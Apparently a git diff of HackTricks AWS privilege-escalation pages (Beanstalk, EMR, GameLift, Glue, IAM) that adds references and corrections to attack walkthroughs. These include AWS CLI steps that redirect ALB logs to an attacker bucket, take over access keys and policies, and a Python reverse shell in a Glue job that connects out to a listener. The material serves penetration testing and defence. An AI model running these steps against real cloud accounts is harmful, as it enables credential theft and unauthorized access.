+```
 
-Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).
+Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).<sup>[[9]](#references)[[10]](#references)</sup>
 
 The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.
-```
 
 ### `elasticbeanstalk:DescribeEnvironmentResources`, `elasticloadbalancing:ModifyLoadBalancerAttributes`, `s3:PutBucketPolicy`, `s3:ListBucket`, `s3:GetObject` to enable ALB access logs exfiltration
 
-If an attacker can **enumerate** an Elastic Beanstalk **web** environment, **update** it, and also **control the policy of an S3 bucket** they own, they may be able to **exfiltrate HTTP traffic** by enabling **ALB access logs** and redirecting them to that bucket.
+If an attacker can **enumerate** an Elastic Beanstalk **web** environment, **update** it, and also **control the policy of an S3 bucket** they own, they may be able to **exfiltrate HTTP traffic** by enabling **ALB access logs** and redirecting them to that bucket.<sup>[[4]](#references)[[11]](#references)</sup>
 
 > [!NOTE]
-> This technique also needs the ability to **modify the destination bucket policy** so the ALB log delivery service can write the logs there.
+> This technique also needs the ability to **modify the destination bucket policy** so the ALB log delivery service can write the logs there.<sup>[[11]](#references)</sup>
 
-Prepare an **attacker-controlled bucket** so the ALB log delivery service can write there:
+Prepare an **attacker-controlled bucket** so the ALB log delivery service can write there. The bucket must be in the same Region as the load balancer, and the prefix must not contain `AWSLogs`.<sup>[[11]](#references)</sup>
 
 ```bash
-ENV_NAME=<environment-name>
-LOG_BUCKET=<attacker-bucket>
-LOG_PREFIX=<prefix>
+REGION="<load-balancer-region>"
+ACCOUNT_ID="<load-balancer-account-id>"
+PROFILE="<profile>"
+LOG_BUCKET="<attacker-bucket>"
+LOG_PREFIX="<prefix>"
+LB_ARN="<load-balancer-arn>"
 cat > /tmp/alb-log-policy.json <<EOF
 {
   "Version": "2012-10-17",
@@ -203,28 +204,15 @@ cat > /tmp/alb-log-policy.json <<EOF
       "Sid": "AllowALBLogDeliveryPut",
       "Effect": "Allow",
       "Principal": {
-        "Service": [
-          "logdelivery.elasticloadbalancing.amazonaws.com",
-          "delivery.logs.amazonaws.com"
-        ]
+        "Service": "logdelivery.elasticloadbalancing.amazonaws.com"
       },
       "Action": "s3:PutObject",
-      "Resource": "arn:aws:s3:::$LOG_BUCKET/$LOG_PREFIX/AWSLogs/$ACCOUNT_ID/*"
-    },
-    {
-      "Sid": "AllowALBLogDeliveryAclCheck",
-      "Effect": "Allow",
-      "Principal": {
-        "Service": [
-          "logdelivery.elasticloadbalancing.amazonaws.com",
-          "delivery.logs.amazonaws.com"
-        ]
-      },
-      "Action": [
-        "s3:GetBucketAcl",
-        "s3:ListBucket"
-      ],
-      "Resource": "arn:aws:s3:::$LOG_BUCKET"
+      "Resource": "arn:aws:s3:::$LOG_BUCKET/$LOG_PREFIX/AWSLogs/$ACCOUNT_ID/*",
+      "Condition": {
+        "ArnLike": {
+          "aws:SourceArn": "arn:aws:elasticloadbalancing:$REGION:$ACCOUNT_ID:loadbalancer/*"
+        }
+      }
     }
   ]
 }
@@ -236,7 +224,7 @@ aws s3api put-bucket-policy \
   --profile "$PROFILE"
 ```
 
-Then enable the ALB access logs:
+Then enable the ALB access logs:<sup>[[11]](#references)</sup>
 
 ```bash
 aws elbv2 modify-load-balancer-attributes \
@@ -245,17 +233,17 @@ aws elbv2 modify-load-balancer-attributes \
     Key=access_logs.s3.enabled,Value=true \
     Key=access_logs.s3.bucket,Value=$LOG_BUCKET \
     Key=access_logs.s3.prefix,Value=$LOG_PREFIX \
-  --region us-east-1 \
+  --region "$REGION" \
   --profile "$PROFILE"
 ```
 
-After that, wait for the ALB to batch and deliver the logs:
+After that, wait for the ALB to batch and deliver the logs.<sup>[[12]](#references)</sup>
 
 ```bash
 aws s3 ls "s3://$LOG_BUCKET/$LOG_PREFIX/AWSLogs/$ACCOUNT_ID/" --recursive --profile "$PROFILE"
 ```
 
-Finally, download the logs and grep for interesting query strings:
+Finally, download the logs and grep for interesting query strings.<sup>[[12]](#references)</sup>
 
 ```bash
 mkdir -p /tmp/lab2-logs
@@ -267,12 +255,27 @@ aws s3 cp "s3://$LOG_BUCKET/$LOG_PREFIX/AWSLogs/$ACCOUNT_ID/" \
 find /tmp/lab2-logs -name '*.gz' -print0 | xargs -0 zgrep -n 'token='
 ```
 
-The **request line** inside the ALB logs may contain values such as **`?token=<FLAG>`** if sensitive data is being sent in the URL.
+The **request line** inside the ALB logs may contain values such as **`?token=<FLAG>`** if sensitive data is being sent in the URL.<sup>[[12]](#references)</sup>
 
 **Impact**:
 
-- Continuous exfiltration of HTTP request metadata through a logging plane controlled by the attacker
-- Exposure of secrets present in the URL query string
-- A stealthier exfiltration path because the traffic is produced by legitimate application components and exported by AWS-managed logging
+- Continuous exfiltration of HTTP request metadata through a logging plane controlled by the attacker<sup>[[11]](#references)[[12]](#references)</sup>
+- Exposure of secrets present in the URL query string<sup>[[12]](#references)</sup>
+- A stealthier exfiltration path because the traffic is produced by legitimate application components and exported by AWS-managed logging<sup>[[11]](#references)[[12]](#references)</sup>
+
+## References
+
+- [1] [AdministratorAccess-AWSElasticBeanstalk - AWS Managed Policy](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AdministratorAccess-AWSElasticBeanstalk.html)
+- [2] [Create an Elastic Beanstalk application source bundle](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/applications-sourcebundle.html)
+- [3] [Rebuilding Elastic Beanstalk environments](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-management-rebuild.html)
+- [4] [Actions, resources, and condition keys for AWS Elastic Beanstalk](https://docs.aws.amazon.com/service-authorization/latest/reference/list_elasticbeanstalk.html)
+- [5] [Grant a user permissions to pass a role to an AWS service](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html)
+- [6] [Managing application versions](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/applications-versions.html)
+- [7] [Elastic Beanstalk supported platforms](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)
+- [8] [Blocking public access to your Amazon S3 storage](https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html)
+- [9] [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk)
+- [10] [Mythic](https://github.com/its-a-feature/Mythic)
+- [11] [Enable access logs for your Application Load Balancer](https://docs.aws.amazon.com/elasticloadbalancing/latest/application/enable-access-logging.html)
+- [12] [Access logs for your Application Load Balancer](https://docs.aws.amazon.com/elasticloadbalancing/latest/application/load-balancer-access-logs.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - EMR Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## EMR
 
 More **info about EMR** in:
@@ -12,8 +10,8 @@ More **info about EMR** in:
 
 ### `iam:PassRole`, `elasticmapreduce:RunJobFlow`
 
-An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\
-Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`).
+An attacker with these permissions can **create and start a new EMR cluster while selecting the EMR service role and EC2 instance profile**. `RunJobFlow` lists `iam:PassRole` as a dependent action, and applications on cluster EC2 instances can obtain temporary credentials for the instance profile; if the selected profile is more privileged, this creates a privilege-escalation path.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)</sup>\
+To reach a node over SSH, the attacker must **know a private key pair imported in the account** (or import one) and be able to **authorize inbound TCP port 22** on the security group associated with the primary node. `RunJobFlow` exposes `Ec2KeyName`, `EmrManagedMasterSecurityGroup`, and `ServiceAccessSecurityGroup` in its instance configuration; verify which security group controls SSH in the target subnet.<sup>[[3]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 # Import EC2 ssh key (you will need extra permissions for this)
@@ -35,34 +33,49 @@ aws emr create-cluster \
 # Wait 1min and connect via ssh to an EC2 instance of the cluster)
 aws emr describe-cluster --cluster-id <id>
 # In MasterPublicDnsName you can find the DNS to connect to the master instance
-## You cna also get this info listing EC2 instances
+## You can also get this info listing EC2 instances
 ```
 
-Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role.
+`--service-role` selects the IAM role assumed by the EMR service, while `InstanceProfile` selects the role assumed by each cluster EC2 instance. SSH puts the attacker on an instance where applications can retrieve temporary credentials for the latter role; it does not by itself expose the separate EMR service role.<sup>[[3]](#references)[[4]](#references)[[5]](#references)</sup>
 
-**Potential Impact:** Privesc to the EC2 service role specified.
+**Potential Impact:** Privilege escalation to the permissions of the specified EC2 instance profile role.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole`
 
-With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role.
+These permissions describe the legacy EMR Notebook create/open path: they let a user list roles and clusters, create an editor, inspect it, and request the Jupyter editor. Current EMR Studio guidance lists additional workspace actions such as `ListEditors`, `DeleteEditor`, `StartEditor`, and `StopEditor`, so validate the exact minimum set against the account's policy and console/API version. Notebook code can interact with AWS services using the notebook's configured service role, so a role with broader permissions than the caller can provide a privilege-escalation path.<sup>[[1]](#references)[[2]](#references)[[9]](#references)[[10]](#references)[[11]](#references)[[13]](#references)</sup>
+
+Current AWS documentation presents EMR Notebooks as EMR Studio Workspaces and requires an attached EMR cluster running release 5.18.0 or later; verify compatibility in the target account.<sup>[[9]](#references)[[13]](#references)</sup>
 
 > [!CAUTION]
-> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related.
+> In the original test, attaching an IAM role to the notebook did not produce credentials for that role; AWS-managed credentials were observed instead. Treat this as an environment- and release-specific observation and verify the effective identity.
+>
+> AWS documents that the notebook service role determines the notebook's permissions when it interacts with other AWS services.<sup>[[11]](#references)</sup>
 
-**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
+**Potential Impact:** Privilege escalation to the permissions of the notebook's configured service role.<sup>[[11]](#references)</sup> The original test recorded `arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile` as the target; the `instance-profile/` ARN identifies a profile container for an IAM role and is not itself an AWS-managed role.<sup>[[12]](#references)</sup>
 
 ### `elasticmapreduce:OpenEditorInConsole`
 
-Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\
-The URL of the notebook is `https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/`
+`elasticmapreduce:OpenEditorInConsole` is the permission used to launch the **Jupyter editor for an EMR notebook**. Current EMR Studio guidance lists `DescribeEditor`, `ListEditors`, `StartEditor`, and `StopEditor` alongside it for workspace access, so the action alone may not be sufficient under every policy or resource condition; when an existing notebook is accessible, opening it can enable code execution using the notebook's configured service and attached-cluster permissions.<sup>[[1]](#references)[[10]](#references)[[11]](#references)[[13]](#references)</sup>\
+Older deployments may expose a URL resembling `https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/`, but Amazon EMR now generates a unique, short-lived presigned URL for each editor session, so use the URL returned by the console/API.<sup>[[10]](#references)</sup>
 
-> [!CAUTION]
-> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related
+The credential-behavior caveat above applies here as well: verify the effective service/cluster identity in the target environment.<sup>[[11]](#references)</sup>
 
-**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
+**Potential Impact:** Access to the permissions available to the existing notebook's configured service/cluster role, subject to its policies.<sup>[[10]](#references)[[11]](#references)</sup>
+
+## References
+
+- [1] [Actions, resources, and condition keys for Amazon Elastic MapReduce - Service Authorization Reference](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonelasticmapreduce.html)
+- [2] [Grant a user permissions to pass a role to an AWS service - AWS Identity and Access Management](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html)
+- [3] [RunJobFlow - Amazon EMR](https://docs.aws.amazon.com/emr/latest/APIReference/API_RunJobFlow.html)
+- [4] [Security in Amazon EMR](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-security.html)
+- [5] [Use IAM roles with applications that call AWS services directly - Amazon EMR](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-iam-roles-calling.html)
+- [6] [Use an EC2 key pair for SSH credentials for Amazon EMR](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-plan-access-ssh.html)
+- [7] [Before you connect to Amazon EMR: Authorize inbound traffic](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-connect-ssh-prereqs.html)
+- [8] [Connect to an Amazon EMR cluster](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-connect-master-node.html)
+- [9] [Amazon EMR Notebooks overview](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-managed-notebooks.html)
+- [10] [Working with EMR Notebooks](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-managed-notebooks-working-with.html)
+- [11] [Service role for EMR Notebooks](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-managed-notebooks-service-role.html)
+- [12] [Use instance profiles - AWS Identity and Access Management](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html)
+- [13] [Configure EMR Studio user permissions for Amazon EC2 or Amazon EKS - Amazon EMR](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-studio-user-permissions.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift/README.md
@@ -1,10 +1,10 @@
 # AWS - Gamelift
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ### `gamelift:RequestUploadCredentials`
 
-With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**.
+The `gamelift:RequestUploadCredentials` action grants permission to retrieve fresh upload credentials for a new game build.<sup>[[1]](#references)[[4]](#references)</sup>
+
+With this permission, an attacker can request temporary credentials to upload a new set of game build files to Amazon GameLift's Amazon S3 storage. The request takes a build ID returned by an initial `CreateBuild` call; on success, GameLift returns the credentials and the associated S3 storage location. The credentials have a limited lifespan and are valid only for the build for which they were issued.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 aws gamelift request-upload-credentials \
@@ -13,9 +13,11 @@ aws gamelift request-upload-credentials \
 
 ## References
 
-- [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
+- [1] [AWS API calls that return credentials](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
+- [2] [RequestUploadCredentials - Amazon GameLift Servers](https://docs.aws.amazon.com/gameliftservers/latest/apireference/API_RequestUploadCredentials.html)
+- [3] [request-upload-credentials - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/gamelift/request-upload-credentials.html)
+- [4] [Actions, resources, and condition keys for Amazon GameLift Servers](https://docs.aws.amazon.com/service-authorization/latest/reference/list_gamelift.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
 
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc/README.md
@@ -1,95 +1,113 @@
 # AWS - Glue Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## glue
 
 ### `iam:PassRole`, `glue:CreateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)
 
-Users with these permissions can **set up a new AWS Glue development endpoint**, **assigning an existing service role assumable by Glue** with specific permissions to this endpoint.
+Users with these permissions can **set up a new AWS Glue development endpoint**, **assigning an existing service role assumable by Glue** with specific permissions to this endpoint.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
-After the setup, the **attacker can SSH into the endpoint's instance**, and steal the IAM credentials of the assigned role:
+After the setup, the **attacker can SSH into the endpoint's instance**, and access the temporary credentials and permissions of the assigned role from the endpoint.<sup>[[1]](#references)[[4]](#references)[[16]](#references)</sup>
+
+Use `GetDevEndpoint` (or `GetDevEndpoints`) to retrieve the endpoint address; VPC endpoints expose a private address, while non-VPC endpoints expose a public address.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 # Create endpoint
-aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
+aws glue create-dev-endpoint --endpoint-name privesctest \
     --role-arn <arn-role> \
     --public-key file:///ssh/key.pub
 
-# Get the public address of the instance
-## You could also use get-dev-endpoints
+# Get the endpoint address
+# You could also use get-dev-endpoints
 aws glue get-dev-endpoint --endpoint-name privesctest
 
-# SSH with the glue user
-ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com
+# SSH with the Glue user and the address returned above
+ssh -i /tmp/private.key <endpoint-address>
 ```
 
-For stealth purpose, it's recommended to use the IAM credentials from inside the Glue virtual machine.
+For stealth purpose, it's recommended to use the IAM credentials from inside the Glue virtual machine.<sup>[[1]](#references)[[16]](#references)</sup>
 
-**Potential Impact:** Privesc to the glue service role specified.
+**Potential Impact:** Privesc to the Glue service role specified.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ### `glue:UpdateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)
 
-Users with this permission can **alter an existing Glue development** endpoint's SSH key, **enabling SSH access to it**. This allows the attacker to execute commands with the privileges of the endpoint's attached role:
+Users with this permission can **alter an existing Glue development** endpoint's SSH key, **enabling SSH access to it**. This allows the attacker to execute commands with the privileges of the endpoint's attached role.<sup>[[1]](#references)[[4]](#references)[[7]](#references)[[8]](#references)[[16]](#references)</sup>
+
+The corresponding CLI operation is `update-dev-endpoint`; its `--public-key` parameter updates the endpoint key.<sup>[[7]](#references)</sup>
 
 ```bash
 # Change public key to connect
-aws glue --endpoint-name target_endpoint \
+aws glue update-dev-endpoint --endpoint-name target_endpoint \
     --public-key file:///ssh/key.pub
 
-# Get the public address of the instance
-## You could also use get-dev-endpoints
-aws glue get-dev-endpoint --endpoint-name privesctest
+# Get the endpoint address
+# You could also use get-dev-endpoints
+aws glue get-dev-endpoint --endpoint-name target_endpoint
 
-# SSH with the glue user
-ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com
+# SSH with the Glue user and the address returned above
+ssh -i /tmp/private.key <endpoint-address>
 ```
 
-**Potential Impact:** Privesc to the glue service role used.
+**Potential Impact:** Privesc to the Glue service role used.<sup>[[1]](#references)[[7]](#references)[[16]](#references)</sup>
 
 ### `iam:PassRole`, (`glue:CreateJob` | `glue:UpdateJob`), (`glue:StartJobRun` | `glue:CreateTrigger`)
 
-Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:UpdateJob`**, and either **`glue:StartJobRun` or `glue:CreateTrigger`** can **create or update an AWS Glue job**, attaching any **Glue service account**, and initiate the job's execution. The job's capabilities include running arbitrary Python code, which can be exploited to establish a reverse shell. This reverse shell can then be utilized to exfiltrate the **IAM credential**s of the role attached to the Glue job, leading to potential unauthorized access or actions based on the permissions of that role:
+With **`iam:PassRole`** and either **`glue:CreateJob` or `glue:UpdateJob`**, a caller can **create or update an AWS Glue job** while attaching a selected execution role. The caller can then use **`glue:StartJobRun`** or **`glue:CreateTrigger`** to initiate the job; `iam:PassRole` is required when passing the selected role to Glue.<sup>[[3]](#references)[[8]](#references)[[9]](#references)[[10]](#references)[[11]](#references)[[12]](#references)</sup>
+
+Glue Python shell jobs run Python scripts from Amazon S3, and the job assumes the permissions of the IAM role specified in its definition. Attacker-controlled code can therefore run arbitrary Python and make AWS API calls as that role; a reverse shell may provide interactive access, subject to the job's network configuration.<sup>[[13]](#references)[[14]](#references)[[15]](#references)</sup>
 
 ```bash
-# Content of the python script saved in s3:
+# Content of the Python script saved in S3:
 #import socket,subprocess,os
 #s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-#s.connect(("2.tcp.ngrok.io",11216))
+#s.connect(("<listener-host>",<listener-port>))
 #os.dup2(s.fileno(),0)
 #os.dup2(s.fileno(),1)
 #os.dup2(s.fileno(),2)
 #p=subprocess.call(["/bin/sh","-i"])
-#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
+#To verify the job's execution role from inside the Glue job, run:
+#python -c 'import boto3; print(boto3.client("sts").get_caller_identity())'
 
 
 # A Glue role with admin access was created
 aws glue create-job \
     --name privesctest \
-    --role arn:aws:iam::93424712358:role/GlueAdmin \
-    --command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'
+    --role arn:aws:iam::123456789012:role/GlueAdmin \
+    --command '{"Name":"pythonshell", "PythonVersion": "3.9", "ScriptLocation":"s3://airflow2123/rev.py"}'
 
 # You can directly start the job
 aws glue start-job-run --job-name privesctest
 # Or you can create a trigger to start it
 aws glue create-trigger --name triggerprivesc --type SCHEDULED \
     --actions '[{"JobName": "privesctest"}]' --start-on-creation \
-    --schedule "0/5 * * * * *"  #Every 5mins, feel free to change
+    --schedule "cron(0/5 * * * ? *)"  #Every 5mins, feel free to change
 ```
 
-**Potential Impact:** Privesc to the glue service role specified.
+**Potential Impact:** Privesc to the Glue service role specified.<sup>[[3]](#references)[[13]](#references)[[14]](#references)[[15]](#references)</sup>
 
 ### `glue:UpdateJob`
 
-Just with the update permission an attacked could steal the IAM Credentials of the already attached role.
+With `glue:UpdateJob` alone, a caller can replace an existing job definition; if a later run uses the already attached role, the replacement code executes with that role's permissions. An existing schedule or other trigger can provide that run when the caller does not have `glue:StartJobRun`.<sup>[[10]](#references)[[12]](#references)[[14]](#references)[[15]](#references)</sup>
 
-**Potential Impact:** Privesc to the glue service role attached.
+**Potential Impact:** Privesc to the Glue service role attached.<sup>[[10]](#references)[[14]](#references)[[15]](#references)</sup>
 
 ## References
 
-- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+- [1] [AWS IAM Privilege Escalation – Methods and Mitigation](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+- [2] [CreateDevEndpoint - AWS Glue](https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html)
+- [3] [Grant a user permissions to pass a role to an AWS service - AWS Identity and Access Management](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html)
+- [4] [Development endpoints - AWS Glue](https://docs.aws.amazon.com/glue/latest/dg/dev-endpoints.html)
+- [5] [GetDevEndpoint - AWS Glue](https://docs.aws.amazon.com/glue/latest/webapi/API_GetDevEndpoint.html)
+- [6] [GetDevEndpoints - AWS Glue](https://docs.aws.amazon.com/glue/latest/webapi/API_GetDevEndpoints.html)
+- [7] [UpdateDevEndpoint - AWS Glue](https://docs.aws.amazon.com/glue/latest/webapi/API_UpdateDevEndpoint.html)
+- [8] [Actions, resources, and condition keys for AWS Glue](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsglue.html)
+- [9] [CreateJob - AWS Glue](https://docs.aws.amazon.com/glue/latest/webapi/API_CreateJob.html)
+- [10] [UpdateJob - AWS Glue](https://docs.aws.amazon.com/glue/latest/webapi/API_UpdateJob.html)
+- [11] [StartJobRun - AWS Glue](https://docs.aws.amazon.com/glue/latest/webapi/API_StartJobRun.html)
+- [12] [CreateTrigger - AWS Glue](https://docs.aws.amazon.com/glue/latest/webapi/API_CreateTrigger.html)
+- [13] [Configuring job properties for Python shell jobs in AWS Glue](https://docs.aws.amazon.com/glue/latest/dg/add-job-python.html)
+- [14] [Review IAM permissions needed for ETL jobs - AWS Glue](https://docs.aws.amazon.com/glue/latest/dg/getting-started-min-privs-job.html)
+- [15] [AWS Glue: How it works](https://docs.aws.amazon.com/glue/latest/dg/how-it-works.html)
+- [16] [Retrieve security credentials from instance metadata - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-security-credentials.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - IAM Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## IAM
 
 For more info about IAM check:
@@ -12,7 +10,7 @@ For more info about IAM check:
 
 ### **`iam:CreatePolicyVersion`**
 
-Grants the ability to create a new IAM policy version, bypassing the need for `iam:SetDefaultPolicyVersion` permission by using the `--set-as-default` flag. This enables defining custom permissions.
+Grants the ability to create a new IAM policy version, bypassing the need for `iam:SetDefaultPolicyVersion` permission by using the `--set-as-default` flag. This enables defining custom permissions.<sup>[[1]](#references)[[2]](#references)</sup>
 
 **Exploit Command:**
 
@@ -21,11 +19,11 @@ aws iam create-policy-version --policy-arn <target_policy_arn> \
     --policy-document file:///path/to/administrator/policy.json --set-as-default
 ```
 
-**Impact:** Directly escalates privileges by allowing any action on any resource.
+**Impact:** Directly escalates privileges when the policy is attached to a principal and the new document allows actions that principal could not previously perform.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### **`iam:SetDefaultPolicyVersion`**
 
-Allows changing the default version of an IAM policy to another existing version, potentially escalating privileges if the new version has more permissions.
+Allows changing the default version of a customer managed IAM policy to another existing version, potentially escalating privileges if the selected version has more permissions.<sup>[[1]](#references)[[2]](#references)</sup>
 
 **Bash Command:**
 
@@ -33,11 +31,11 @@ Allows changing the default version of an IAM policy to another existing version
 aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2
 ```
 
-**Impact:** Indirect privilege escalation by enabling more permissions.
+**Impact:** Indirect privilege escalation by enabling the permissions in the selected policy version for every principal to which that policy is attached.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### **`iam:CreateAccessKey`, (`iam:DeleteAccessKey`)**
 
-Enables creating access key ID and secret access key for another user, leading to potential privilege escalation.
+Enables creating an access key ID and secret access key for another user, leading to potential privilege escalation if that user has more permissions. Access keys are long-term credentials and can be used to make programmatic AWS API or CLI requests.<sup>[[1]](#references)[[3]](#references)</sup>
 
 **Exploit:**
 
@@ -45,57 +43,17 @@ Enables creating access key ID and secret access key for another user, leading t
 aws iam create-access-key --user-name <target_user>
 ```
 
-**Impact:** Direct privilege escalation by assuming another user's extended permissions.
+**Impact:** Direct privilege escalation by using the target user's permissions.<sup>[[1]](#references)[[3]](#references)</sup>
 
-Note that a user can only have 2 access keys created, so if a user already has 2 access keys you will need the permission `iam:DeleteAccessKey` to detele one of them to be able to create a new one:
+Note that a user can have a maximum of two access keys. If a user already has two access keys, you need `iam:DeleteAccessKey` on one of them before creating another:<sup>[[3]](#references)</sup>
 
 ```bash
 aws iam delete-access-key --access-key-id <key_id>
 ```
 
-### **`iam:CreateVirtualMFADevice` + `iam:EnableMFADevice`**
-
-If you can create a new virtual MFA device and enable it on another user, you can effectively enroll your own MFA for that user and then request an MFA-backed session for their credentials.
-
-**Prerequisites:**
-
-You can use any tool you want for the TOTP codes - oathtool is easy and lightweight.
-
-```bash
-sudo apt install oathtool
-sudo dnf install oathtool
-sudo yum install oathtool
-```
-
-**Exploit:**
-
-```bash
-# Create a virtual MFA device (this returns the serial and the base32 seed)
-aws iam create-virtual-mfa-device --virtual-mfa-device-name <name-the-device> \
-    --bootstrap-method Base32StringSeed --outfile /path/to/save/mfa-seed.txt
-
-# Generate 2 consecutive TOTP codes from the seed
-
-oathtool --base32 --totp "<Seed_Here>" -w 1
-
-# Enable the new device for the user
-aws iam enable-mfa-device --user-name <target_user> --serial-number <device-arn> \
-  --authentication-code1 <code1> --authentication-code2 <code2>
-```
-
-**Authenticate:**
-
-Once you have a basic session as the target user, you can use the security token service to get an MFA-backed token.
-
-```bash
-aws sts get-session-token --serial-number <device-arn> --token-code <code>
-```
-
-**Impact:** Direct privilege escalation by taking over a user's MFA enrollment (and then using their permissions).
-
 ### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`**
 
-Permits creating or updating a login profile, including setting passwords for AWS console login, leading to direct privilege escalation.
